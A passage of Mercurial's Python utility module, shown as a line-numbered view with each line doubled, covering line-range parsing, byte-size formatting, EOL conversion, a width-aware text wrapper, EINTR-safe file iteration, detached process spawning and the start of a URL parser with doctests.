2197 return go
2198
2198
2199 def processlinerange(fromline, toline):
2199 def processlinerange(fromline, toline):
2200 """Check that linerange <fromline>:<toline> makes sense and return a
2200 """Check that linerange <fromline>:<toline> makes sense and return a
2201 0-based range.
2201 0-based range.
2202
2202
2203 >>> processlinerange(10, 20)
2203 >>> processlinerange(10, 20)
2204 (9, 20)
2204 (9, 20)
2205 >>> processlinerange(2, 1)
2205 >>> processlinerange(2, 1)
2206 Traceback (most recent call last):
2206 Traceback (most recent call last):
2207 ...
2207 ...
2208 ParseError: line range must be positive
2208 ParseError: line range must be positive
2209 >>> processlinerange(0, 5)
2209 >>> processlinerange(0, 5)
2210 Traceback (most recent call last):
2210 Traceback (most recent call last):
2211 ...
2211 ...
2212 ParseError: fromline must be strictly positive
2212 ParseError: fromline must be strictly positive
2213 """
2213 """
2214 if toline - fromline < 0:
2214 if toline - fromline < 0:
2215 raise error.ParseError(_("line range must be positive"))
2215 raise error.ParseError(_("line range must be positive"))
2216 if fromline < 1:
2216 if fromline < 1:
2217 raise error.ParseError(_("fromline must be strictly positive"))
2217 raise error.ParseError(_("fromline must be strictly positive"))
2218 return fromline - 1, toline
2218 return fromline - 1, toline
2219
2219
2220 bytecount = unitcountfn(
2220 bytecount = unitcountfn(
2221 (100, 1 << 30, _('%.0f GB')),
2221 (100, 1 << 30, _('%.0f GB')),
2222 (10, 1 << 30, _('%.1f GB')),
2222 (10, 1 << 30, _('%.1f GB')),
2223 (1, 1 << 30, _('%.2f GB')),
2223 (1, 1 << 30, _('%.2f GB')),
2224 (100, 1 << 20, _('%.0f MB')),
2224 (100, 1 << 20, _('%.0f MB')),
2225 (10, 1 << 20, _('%.1f MB')),
2225 (10, 1 << 20, _('%.1f MB')),
2226 (1, 1 << 20, _('%.2f MB')),
2226 (1, 1 << 20, _('%.2f MB')),
2227 (100, 1 << 10, _('%.0f KB')),
2227 (100, 1 << 10, _('%.0f KB')),
2228 (10, 1 << 10, _('%.1f KB')),
2228 (10, 1 << 10, _('%.1f KB')),
2229 (1, 1 << 10, _('%.2f KB')),
2229 (1, 1 << 10, _('%.2f KB')),
2230 (1, 1, _('%.0f bytes')),
2230 (1, 1, _('%.0f bytes')),
2231 )
2231 )
2232
2232
2233 # Matches a single EOL which can either be a CRLF where repeated CR
2233 # Matches a single EOL which can either be a CRLF where repeated CR
2234 # are removed or a LF. We do not care about old Macintosh files, so a
2234 # are removed or a LF. We do not care about old Macintosh files, so a
2235 # stray CR is an error.
2235 # stray CR is an error.
2236 _eolre = remod.compile(br'\r*\n')
2236 _eolre = remod.compile(br'\r*\n')
2237
2237
2238 def tolf(s):
2238 def tolf(s):
2239 return _eolre.sub('\n', s)
2239 return _eolre.sub('\n', s)
2240
2240
2241 def tocrlf(s):
2241 def tocrlf(s):
2242 return _eolre.sub('\r\n', s)
2242 return _eolre.sub('\r\n', s)
2243
2243
2244 if pycompat.oslinesep == '\r\n':
2244 if pycompat.oslinesep == '\r\n':
2245 tonativeeol = tocrlf
2245 tonativeeol = tocrlf
2246 fromnativeeol = tolf
2246 fromnativeeol = tolf
2247 else:
2247 else:
2248 tonativeeol = pycompat.identity
2248 tonativeeol = pycompat.identity
2249 fromnativeeol = pycompat.identity
2249 fromnativeeol = pycompat.identity
2250
2250
2251 def escapestr(s):
2251 def escapestr(s):
2252 # call underlying function of s.encode('string_escape') directly for
2252 # call underlying function of s.encode('string_escape') directly for
2253 # Python 3 compatibility
2253 # Python 3 compatibility
2254 return codecs.escape_encode(s)[0]
2254 return codecs.escape_encode(s)[0]
2255
2255
2256 def unescapestr(s):
2256 def unescapestr(s):
2257 return codecs.escape_decode(s)[0]
2257 return codecs.escape_decode(s)[0]
2258
2258
2259 def uirepr(s):
2259 def uirepr(s):
2260 # Avoid double backslash in Windows path repr()
2260 # Avoid double backslash in Windows path repr()
2261 return repr(s).replace('\\\\', '\\')
2261 return repr(s).replace('\\\\', '\\')
2262
2262
2263 # delay import of textwrap
2263 # delay import of textwrap
2264 def MBTextWrapper(**kwargs):
2264 def MBTextWrapper(**kwargs):
2265 class tw(textwrap.TextWrapper):
2265 class tw(textwrap.TextWrapper):
2266 """
2266 """
2267 Extend TextWrapper for width-awareness.
2267 Extend TextWrapper for width-awareness.
2268
2268
2269 Neither number of 'bytes' in any encoding nor 'characters' is
2269 Neither number of 'bytes' in any encoding nor 'characters' is
2270 appropriate to calculate terminal columns for specified string.
2270 appropriate to calculate terminal columns for specified string.
2271
2271
2272 Original TextWrapper implementation uses built-in 'len()' directly,
2272 Original TextWrapper implementation uses built-in 'len()' directly,
2273 so overriding is needed to use width information of each characters.
2273 so overriding is needed to use width information of each characters.
2274
2274
2275 In addition, characters classified into 'ambiguous' width are
2275 In addition, characters classified into 'ambiguous' width are
2276 treated as wide in East Asian area, but as narrow in other.
2276 treated as wide in East Asian area, but as narrow in other.
2277
2277
2278 This requires use decision to determine width of such characters.
2278 This requires use decision to determine width of such characters.
2279 """
2279 """
2280 def _cutdown(self, ucstr, space_left):
2280 def _cutdown(self, ucstr, space_left):
2281 l = 0
2281 l = 0
2282 colwidth = encoding.ucolwidth
2282 colwidth = encoding.ucolwidth
2283 for i in xrange(len(ucstr)):
2283 for i in xrange(len(ucstr)):
2284 l += colwidth(ucstr[i])
2284 l += colwidth(ucstr[i])
2285 if space_left < l:
2285 if space_left < l:
2286 return (ucstr[:i], ucstr[i:])
2286 return (ucstr[:i], ucstr[i:])
2287 return ucstr, ''
2287 return ucstr, ''
2288
2288
2289 # overriding of base class
2289 # overriding of base class
2290 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2290 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2291 space_left = max(width - cur_len, 1)
2291 space_left = max(width - cur_len, 1)
2292
2292
2293 if self.break_long_words:
2293 if self.break_long_words:
2294 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2294 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2295 cur_line.append(cut)
2295 cur_line.append(cut)
2296 reversed_chunks[-1] = res
2296 reversed_chunks[-1] = res
2297 elif not cur_line:
2297 elif not cur_line:
2298 cur_line.append(reversed_chunks.pop())
2298 cur_line.append(reversed_chunks.pop())
2299
2299
2300 # this overriding code is imported from TextWrapper of Python 2.6
2300 # this overriding code is imported from TextWrapper of Python 2.6
2301 # to calculate columns of string by 'encoding.ucolwidth()'
2301 # to calculate columns of string by 'encoding.ucolwidth()'
2302 def _wrap_chunks(self, chunks):
2302 def _wrap_chunks(self, chunks):
2303 colwidth = encoding.ucolwidth
2303 colwidth = encoding.ucolwidth
2304
2304
2305 lines = []
2305 lines = []
2306 if self.width <= 0:
2306 if self.width <= 0:
2307 raise ValueError("invalid width %r (must be > 0)" % self.width)
2307 raise ValueError("invalid width %r (must be > 0)" % self.width)
2308
2308
2309 # Arrange in reverse order so items can be efficiently popped
2309 # Arrange in reverse order so items can be efficiently popped
2310 # from a stack of chucks.
2310 # from a stack of chucks.
2311 chunks.reverse()
2311 chunks.reverse()
2312
2312
2313 while chunks:
2313 while chunks:
2314
2314
2315 # Start the list of chunks that will make up the current line.
2315 # Start the list of chunks that will make up the current line.
2316 # cur_len is just the length of all the chunks in cur_line.
2316 # cur_len is just the length of all the chunks in cur_line.
2317 cur_line = []
2317 cur_line = []
2318 cur_len = 0
2318 cur_len = 0
2319
2319
2320 # Figure out which static string will prefix this line.
2320 # Figure out which static string will prefix this line.
2321 if lines:
2321 if lines:
2322 indent = self.subsequent_indent
2322 indent = self.subsequent_indent
2323 else:
2323 else:
2324 indent = self.initial_indent
2324 indent = self.initial_indent
2325
2325
2326 # Maximum width for this line.
2326 # Maximum width for this line.
2327 width = self.width - len(indent)
2327 width = self.width - len(indent)
2328
2328
2329 # First chunk on line is whitespace -- drop it, unless this
2329 # First chunk on line is whitespace -- drop it, unless this
2330 # is the very beginning of the text (i.e. no lines started yet).
2330 # is the very beginning of the text (i.e. no lines started yet).
2331 if self.drop_whitespace and chunks[-1].strip() == '' and lines:
2331 if self.drop_whitespace and chunks[-1].strip() == '' and lines:
2332 del chunks[-1]
2332 del chunks[-1]
2333
2333
2334 while chunks:
2334 while chunks:
2335 l = colwidth(chunks[-1])
2335 l = colwidth(chunks[-1])
2336
2336
2337 # Can at least squeeze this chunk onto the current line.
2337 # Can at least squeeze this chunk onto the current line.
2338 if cur_len + l <= width:
2338 if cur_len + l <= width:
2339 cur_line.append(chunks.pop())
2339 cur_line.append(chunks.pop())
2340 cur_len += l
2340 cur_len += l
2341
2341
2342 # Nope, this line is full.
2342 # Nope, this line is full.
2343 else:
2343 else:
2344 break
2344 break
2345
2345
2346 # The current line is full, and the next chunk is too big to
2346 # The current line is full, and the next chunk is too big to
2347 # fit on *any* line (not just this one).
2347 # fit on *any* line (not just this one).
2348 if chunks and colwidth(chunks[-1]) > width:
2348 if chunks and colwidth(chunks[-1]) > width:
2349 self._handle_long_word(chunks, cur_line, cur_len, width)
2349 self._handle_long_word(chunks, cur_line, cur_len, width)
2350
2350
2351 # If the last chunk on this line is all whitespace, drop it.
2351 # If the last chunk on this line is all whitespace, drop it.
2352 if (self.drop_whitespace and
2352 if (self.drop_whitespace and
2353 cur_line and cur_line[-1].strip() == ''):
2353 cur_line and cur_line[-1].strip() == ''):
2354 del cur_line[-1]
2354 del cur_line[-1]
2355
2355
2356 # Convert current line back to a string and store it in list
2356 # Convert current line back to a string and store it in list
2357 # of all lines (return value).
2357 # of all lines (return value).
2358 if cur_line:
2358 if cur_line:
2359 lines.append(indent + ''.join(cur_line))
2359 lines.append(indent + ''.join(cur_line))
2360
2360
2361 return lines
2361 return lines
2362
2362
2363 global MBTextWrapper
2363 global MBTextWrapper
2364 MBTextWrapper = tw
2364 MBTextWrapper = tw
2365 return tw(**kwargs)
2365 return tw(**kwargs)
2366
2366
2367 def wrap(line, width, initindent='', hangindent=''):
2367 def wrap(line, width, initindent='', hangindent=''):
2368 maxindent = max(len(hangindent), len(initindent))
2368 maxindent = max(len(hangindent), len(initindent))
2369 if width <= maxindent:
2369 if width <= maxindent:
2370 # adjust for weird terminal size
2370 # adjust for weird terminal size
2371 width = max(78, maxindent + 1)
2371 width = max(78, maxindent + 1)
2372 line = line.decode(pycompat.sysstr(encoding.encoding),
2372 line = line.decode(pycompat.sysstr(encoding.encoding),
2373 pycompat.sysstr(encoding.encodingmode))
2373 pycompat.sysstr(encoding.encodingmode))
2374 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2374 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2375 pycompat.sysstr(encoding.encodingmode))
2375 pycompat.sysstr(encoding.encodingmode))
2376 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2376 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2377 pycompat.sysstr(encoding.encodingmode))
2377 pycompat.sysstr(encoding.encodingmode))
2378 wrapper = MBTextWrapper(width=width,
2378 wrapper = MBTextWrapper(width=width,
2379 initial_indent=initindent,
2379 initial_indent=initindent,
2380 subsequent_indent=hangindent)
2380 subsequent_indent=hangindent)
2381 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2381 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2382
2382
2383 if (pyplatform.python_implementation() == 'CPython' and
2383 if (pyplatform.python_implementation() == 'CPython' and
2384 sys.version_info < (3, 0)):
2384 sys.version_info < (3, 0)):
2385 # There is an issue in CPython that some IO methods do not handle EINTR
2385 # There is an issue in CPython that some IO methods do not handle EINTR
2386 # correctly. The following table shows what CPython version (and functions)
2386 # correctly. The following table shows what CPython version (and functions)
2387 # are affected (buggy: has the EINTR bug, okay: otherwise):
2387 # are affected (buggy: has the EINTR bug, okay: otherwise):
2388 #
2388 #
2389 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2389 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2390 # --------------------------------------------------
2390 # --------------------------------------------------
2391 # fp.__iter__ | buggy | buggy | okay
2391 # fp.__iter__ | buggy | buggy | okay
2392 # fp.read* | buggy | okay [1] | okay
2392 # fp.read* | buggy | okay [1] | okay
2393 #
2393 #
2394 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2394 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2395 #
2395 #
2396 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2396 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2397 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2397 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2398 #
2398 #
2399 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2399 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2400 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2400 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2401 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2401 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2402 # fp.__iter__ but not other fp.read* methods.
2402 # fp.__iter__ but not other fp.read* methods.
2403 #
2403 #
2404 # On modern systems like Linux, the "read" syscall cannot be interrupted
2404 # On modern systems like Linux, the "read" syscall cannot be interrupted
2405 # when reading "fast" files like on-disk files. So the EINTR issue only
2405 # when reading "fast" files like on-disk files. So the EINTR issue only
2406 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2406 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2407 # files approximately as "fast" files and use the fast (unsafe) code path,
2407 # files approximately as "fast" files and use the fast (unsafe) code path,
2408 # to minimize the performance impact.
2408 # to minimize the performance impact.
2409 if sys.version_info >= (2, 7, 4):
2409 if sys.version_info >= (2, 7, 4):
2410 # fp.readline deals with EINTR correctly, use it as a workaround.
2410 # fp.readline deals with EINTR correctly, use it as a workaround.
2411 def _safeiterfile(fp):
2411 def _safeiterfile(fp):
2412 return iter(fp.readline, '')
2412 return iter(fp.readline, '')
2413 else:
2413 else:
2414 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2414 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2415 # note: this may block longer than necessary because of bufsize.
2415 # note: this may block longer than necessary because of bufsize.
2416 def _safeiterfile(fp, bufsize=4096):
2416 def _safeiterfile(fp, bufsize=4096):
2417 fd = fp.fileno()
2417 fd = fp.fileno()
2418 line = ''
2418 line = ''
2419 while True:
2419 while True:
2420 try:
2420 try:
2421 buf = os.read(fd, bufsize)
2421 buf = os.read(fd, bufsize)
2422 except OSError as ex:
2422 except OSError as ex:
2423 # os.read only raises EINTR before any data is read
2423 # os.read only raises EINTR before any data is read
2424 if ex.errno == errno.EINTR:
2424 if ex.errno == errno.EINTR:
2425 continue
2425 continue
2426 else:
2426 else:
2427 raise
2427 raise
2428 line += buf
2428 line += buf
2429 if '\n' in buf:
2429 if '\n' in buf:
2430 splitted = line.splitlines(True)
2430 splitted = line.splitlines(True)
2431 line = ''
2431 line = ''
2432 for l in splitted:
2432 for l in splitted:
2433 if l[-1] == '\n':
2433 if l[-1] == '\n':
2434 yield l
2434 yield l
2435 else:
2435 else:
2436 line = l
2436 line = l
2437 if not buf:
2437 if not buf:
2438 break
2438 break
2439 if line:
2439 if line:
2440 yield line
2440 yield line
2441
2441
2442 def iterfile(fp):
2442 def iterfile(fp):
2443 fastpath = True
2443 fastpath = True
2444 if type(fp) is file:
2444 if type(fp) is file:
2445 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2445 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2446 if fastpath:
2446 if fastpath:
2447 return fp
2447 return fp
2448 else:
2448 else:
2449 return _safeiterfile(fp)
2449 return _safeiterfile(fp)
2450 else:
2450 else:
2451 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2451 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2452 def iterfile(fp):
2452 def iterfile(fp):
2453 return fp
2453 return fp
2454
2454
2455 def iterlines(iterator):
2455 def iterlines(iterator):
2456 for chunk in iterator:
2456 for chunk in iterator:
2457 for line in chunk.splitlines():
2457 for line in chunk.splitlines():
2458 yield line
2458 yield line
2459
2459
2460 def expandpath(path):
2460 def expandpath(path):
2461 return os.path.expanduser(os.path.expandvars(path))
2461 return os.path.expanduser(os.path.expandvars(path))
2462
2462
2463 def hgcmd():
2463 def hgcmd():
2464 """Return the command used to execute current hg
2464 """Return the command used to execute current hg
2465
2465
2466 This is different from hgexecutable() because on Windows we want
2466 This is different from hgexecutable() because on Windows we want
2467 to avoid things opening new shell windows like batch files, so we
2467 to avoid things opening new shell windows like batch files, so we
2468 get either the python call or current executable.
2468 get either the python call or current executable.
2469 """
2469 """
2470 if mainfrozen():
2470 if mainfrozen():
2471 if getattr(sys, 'frozen', None) == 'macosx_app':
2471 if getattr(sys, 'frozen', None) == 'macosx_app':
2472 # Env variable set by py2app
2472 # Env variable set by py2app
2473 return [encoding.environ['EXECUTABLEPATH']]
2473 return [encoding.environ['EXECUTABLEPATH']]
2474 else:
2474 else:
2475 return [pycompat.sysexecutable]
2475 return [pycompat.sysexecutable]
2476 return gethgcmd()
2476 return gethgcmd()
2477
2477
2478 def rundetached(args, condfn):
2478 def rundetached(args, condfn):
2479 """Execute the argument list in a detached process.
2479 """Execute the argument list in a detached process.
2480
2480
2481 condfn is a callable which is called repeatedly and should return
2481 condfn is a callable which is called repeatedly and should return
2482 True once the child process is known to have started successfully.
2482 True once the child process is known to have started successfully.
2483 At this point, the child process PID is returned. If the child
2483 At this point, the child process PID is returned. If the child
2484 process fails to start or finishes before condfn() evaluates to
2484 process fails to start or finishes before condfn() evaluates to
2485 True, return -1.
2485 True, return -1.
2486 """
2486 """
2487 # Windows case is easier because the child process is either
2487 # Windows case is easier because the child process is either
2488 # successfully starting and validating the condition or exiting
2488 # successfully starting and validating the condition or exiting
2489 # on failure. We just poll on its PID. On Unix, if the child
2489 # on failure. We just poll on its PID. On Unix, if the child
2490 # process fails to start, it will be left in a zombie state until
2490 # process fails to start, it will be left in a zombie state until
2491 # the parent wait on it, which we cannot do since we expect a long
2491 # the parent wait on it, which we cannot do since we expect a long
2492 # running process on success. Instead we listen for SIGCHLD telling
2492 # running process on success. Instead we listen for SIGCHLD telling
2493 # us our child process terminated.
2493 # us our child process terminated.
2494 terminated = set()
2494 terminated = set()
2495 def handler(signum, frame):
2495 def handler(signum, frame):
2496 terminated.add(os.wait())
2496 terminated.add(os.wait())
2497 prevhandler = None
2497 prevhandler = None
2498 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2498 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2499 if SIGCHLD is not None:
2499 if SIGCHLD is not None:
2500 prevhandler = signal.signal(SIGCHLD, handler)
2500 prevhandler = signal.signal(SIGCHLD, handler)
2501 try:
2501 try:
2502 pid = spawndetached(args)
2502 pid = spawndetached(args)
2503 while not condfn():
2503 while not condfn():
2504 if ((pid in terminated or not testpid(pid))
2504 if ((pid in terminated or not testpid(pid))
2505 and not condfn()):
2505 and not condfn()):
2506 return -1
2506 return -1
2507 time.sleep(0.1)
2507 time.sleep(0.1)
2508 return pid
2508 return pid
2509 finally:
2509 finally:
2510 if prevhandler is not None:
2510 if prevhandler is not None:
2511 signal.signal(signal.SIGCHLD, prevhandler)
2511 signal.signal(signal.SIGCHLD, prevhandler)
2512
2512
2513 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2513 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2514 """Return the result of interpolating items in the mapping into string s.
2514 """Return the result of interpolating items in the mapping into string s.
2515
2515
2516 prefix is a single character string, or a two character string with
2516 prefix is a single character string, or a two character string with
2517 a backslash as the first character if the prefix needs to be escaped in
2517 a backslash as the first character if the prefix needs to be escaped in
2518 a regular expression.
2518 a regular expression.
2519
2519
2520 fn is an optional function that will be applied to the replacement text
2520 fn is an optional function that will be applied to the replacement text
2521 just before replacement.
2521 just before replacement.
2522
2522
2523 escape_prefix is an optional flag that allows using doubled prefix for
2523 escape_prefix is an optional flag that allows using doubled prefix for
2524 its escaping.
2524 its escaping.
2525 """
2525 """
2526 fn = fn or (lambda s: s)
2526 fn = fn or (lambda s: s)
2527 patterns = '|'.join(mapping.keys())
2527 patterns = '|'.join(mapping.keys())
2528 if escape_prefix:
2528 if escape_prefix:
2529 patterns += '|' + prefix
2529 patterns += '|' + prefix
2530 if len(prefix) > 1:
2530 if len(prefix) > 1:
2531 prefix_char = prefix[1:]
2531 prefix_char = prefix[1:]
2532 else:
2532 else:
2533 prefix_char = prefix
2533 prefix_char = prefix
2534 mapping[prefix_char] = prefix_char
2534 mapping[prefix_char] = prefix_char
2535 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2535 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2536 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2536 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2537
2537
2538 def getport(port):
2538 def getport(port):
2539 """Return the port for a given network service.
2539 """Return the port for a given network service.
2540
2540
2541 If port is an integer, it's returned as is. If it's a string, it's
2541 If port is an integer, it's returned as is. If it's a string, it's
2542 looked up using socket.getservbyname(). If there's no matching
2542 looked up using socket.getservbyname(). If there's no matching
2543 service, error.Abort is raised.
2543 service, error.Abort is raised.
2544 """
2544 """
2545 try:
2545 try:
2546 return int(port)
2546 return int(port)
2547 except ValueError:
2547 except ValueError:
2548 pass
2548 pass
2549
2549
2550 try:
2550 try:
2551 return socket.getservbyname(port)
2551 return socket.getservbyname(port)
2552 except socket.error:
2552 except socket.error:
2553 raise Abort(_("no port number associated with service '%s'") % port)
2553 raise Abort(_("no port number associated with service '%s'") % port)
2554
2554
2555 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2555 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2556 '0': False, 'no': False, 'false': False, 'off': False,
2556 '0': False, 'no': False, 'false': False, 'off': False,
2557 'never': False}
2557 'never': False}
2558
2558
2559 def parsebool(s):
2559 def parsebool(s):
2560 """Parse s into a boolean.
2560 """Parse s into a boolean.
2561
2561
2562 If s is not a valid boolean, returns None.
2562 If s is not a valid boolean, returns None.
2563 """
2563 """
2564 return _booleans.get(s.lower(), None)
2564 return _booleans.get(s.lower(), None)
2565
2565
2566 _hextochr = dict((a + b, chr(int(a + b, 16)))
2566 _hextochr = dict((a + b, chr(int(a + b, 16)))
2567 for a in string.hexdigits for b in string.hexdigits)
2567 for a in string.hexdigits for b in string.hexdigits)
2568
2568
2569 class url(object):
2569 class url(object):
2570 r"""Reliable URL parser.
2570 r"""Reliable URL parser.
2571
2571
2572 This parses URLs and provides attributes for the following
2572 This parses URLs and provides attributes for the following
2573 components:
2573 components:
2574
2574
2575 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2575 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2576
2576
2577 Missing components are set to None. The only exception is
2577 Missing components are set to None. The only exception is
2578 fragment, which is set to '' if present but empty.
2578 fragment, which is set to '' if present but empty.
2579
2579
2580 If parsefragment is False, fragment is included in query. If
2580 If parsefragment is False, fragment is included in query. If
2581 parsequery is False, query is included in path. If both are
2581 parsequery is False, query is included in path. If both are
2582 False, both fragment and query are included in path.
2582 False, both fragment and query are included in path.
2583
2583
2584 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2584 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2585
2585
2586 Note that for backward compatibility reasons, bundle URLs do not
2586 Note that for backward compatibility reasons, bundle URLs do not
2587 take host names. That means 'bundle://../' has a path of '../'.
2587 take host names. That means 'bundle://../' has a path of '../'.
2588
2588
2589 Examples:
2589 Examples:
2590
2590
2591 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2591 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2592 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2592 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2593 >>> url('ssh://[::1]:2200//home/joe/repo')
2593 >>> url('ssh://[::1]:2200//home/joe/repo')
2594 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2594 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2595 >>> url('file:///home/joe/repo')
2595 >>> url('file:///home/joe/repo')
2596 <url scheme: 'file', path: '/home/joe/repo'>
2596 <url scheme: 'file', path: '/home/joe/repo'>
2597 >>> url('file:///c:/temp/foo/')
2597 >>> url('file:///c:/temp/foo/')
2598 <url scheme: 'file', path: 'c:/temp/foo/'>
2598 <url scheme: 'file', path: 'c:/temp/foo/'>
2599 >>> url('bundle:foo')
2599 >>> url('bundle:foo')
2600 <url scheme: 'bundle', path: 'foo'>
2600 <url scheme: 'bundle', path: 'foo'>
2601 >>> url('bundle://../foo')
2601 >>> url('bundle://../foo')
2602 <url scheme: 'bundle', path: '../foo'>
2602 <url scheme: 'bundle', path: '../foo'>
2603 >>> url(r'c:\foo\bar')
2603 >>> url(r'c:\foo\bar')
2604 <url path: 'c:\\foo\\bar'>
2604 <url path: 'c:\\foo\\bar'>
2605 >>> url(r'\\blah\blah\blah')
2605 >>> url(r'\\blah\blah\blah')
2606 <url path: '\\\\blah\\blah\\blah'>
2606 <url path: '\\\\blah\\blah\\blah'>
2607 >>> url(r'\\blah\blah\blah#baz')
2607 >>> url(r'\\blah\blah\blah#baz')
2608 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2608 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2609 >>> url(r'file:///C:\users\me')
2609 >>> url(r'file:///C:\users\me')
2610 <url scheme: 'file', path: 'C:\\users\\me'>
2610 <url scheme: 'file', path: 'C:\\users\\me'>
2611
2611
2612 Authentication credentials:
2612 Authentication credentials:
2613
2613
2614 >>> url('ssh://joe:xyz@x/repo')
2614 >>> url('ssh://joe:xyz@x/repo')
2615 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2615 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2616 >>> url('ssh://joe@x/repo')
2616 >>> url('ssh://joe@x/repo')
2617 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2617 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2618
2618
2619 Query strings and fragments:
2619 Query strings and fragments:
2620
2620
2621 >>> url('http://host/a?b#c')
2621 >>> url('http://host/a?b#c')
2622 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2622 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2623 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2623 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2624 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2624 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2625
2625
2626 Empty path:
2626 Empty path:
2627
2627
2628 >>> url('')
2628 >>> url('')
2629 <url path: ''>
2629 <url path: ''>
2630 >>> url('#a')
2630 >>> url('#a')
2631 <url path: '', fragment: 'a'>
2631 <url path: '', fragment: 'a'>
2632 >>> url('http://host/')
2632 >>> url('http://host/')
2633 <url scheme: 'http', host: 'host', path: ''>
2633 <url scheme: 'http', host: 'host', path: ''>
2634 >>> url('http://host/#a')
2634 >>> url('http://host/#a')
2635 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2635 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2636
2636
2637 Only scheme:
2637 Only scheme:
2638
2638
2639 >>> url('http:')
2639 >>> url('http:')
2640 <url scheme: 'http'>
2640 <url scheme: 'http'>
2641 """
2641 """
2642
2642
2643 _safechars = "!~*'()+"
2643 _safechars = "!~*'()+"
2644 _safepchars = "/!~*'()+:\\"
2644 _safepchars = "/!~*'()+:\\"
2645 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2645 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2646
2646
2647 def __init__(self, path, parsequery=True, parsefragment=True):
2647 def __init__(self, path, parsequery=True, parsefragment=True):
2648 # We slowly chomp away at path until we have only the path left
2648 # We slowly chomp away at path until we have only the path left
2649 self.scheme = self.user = self.passwd = self.host = None
2649 self.scheme = self.user = self.passwd = self.host = None
2650 self.port = self.path = self.query = self.fragment = None
2650 self.port = self.path = self.query = self.fragment = None
2651 self._localpath = True
2651 self._localpath = True
2652 self._hostport = ''
2652 self._hostport = ''
2653 self._origpath = path
2653 self._origpath = path
2654
2654
2655 if parsefragment and '#' in path:
2655 if parsefragment and '#' in path:
2656 path, self.fragment = path.split('#', 1)
2656 path, self.fragment = path.split('#', 1)
2657
2657
2658 # special case for Windows drive letters and UNC paths
2658 # special case for Windows drive letters and UNC paths
2659 if hasdriveletter(path) or path.startswith('\\\\'):
2659 if hasdriveletter(path) or path.startswith('\\\\'):
2660 self.path = path
2660 self.path = path
2661 return
2661 return
2662
2662
2663 # For compatibility reasons, we can't handle bundle paths as
2663 # For compatibility reasons, we can't handle bundle paths as
2664 # normal URLS
2664 # normal URLS
2665 if path.startswith('bundle:'):
2665 if path.startswith('bundle:'):
2666 self.scheme = 'bundle'
2666 self.scheme = 'bundle'
2667 path = path[7:]
2667 path = path[7:]
2668 if path.startswith('//'):
2668 if path.startswith('//'):
2669 path = path[2:]
2669 path = path[2:]
2670 self.path = path
2670 self.path = path
2671 return
2671 return
2672
2672
2673 if self._matchscheme(path):
2673 if self._matchscheme(path):
2674 parts = path.split(':', 1)
